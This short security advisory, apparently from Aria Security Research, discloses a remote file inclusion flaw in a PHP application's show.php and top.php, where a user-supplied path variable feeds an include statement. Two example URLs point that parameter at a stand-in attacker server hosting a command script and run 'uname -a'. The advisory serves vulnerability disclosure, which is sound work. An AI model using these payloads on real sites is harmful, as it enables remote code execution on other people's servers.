Disscution:
The problem exists is in the files "show.php" and "top.php" when include the
variable $Path
Vulnerable Code:
include($path."cfg.php")
Exploitation example:
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a
http://[target].com/[path]/top.php?path=http://evilserver/cmd.gif?&cmd=uname -a
Contact the Vendor
===========================================================
Aria Security Research
Http://www.aria-security.net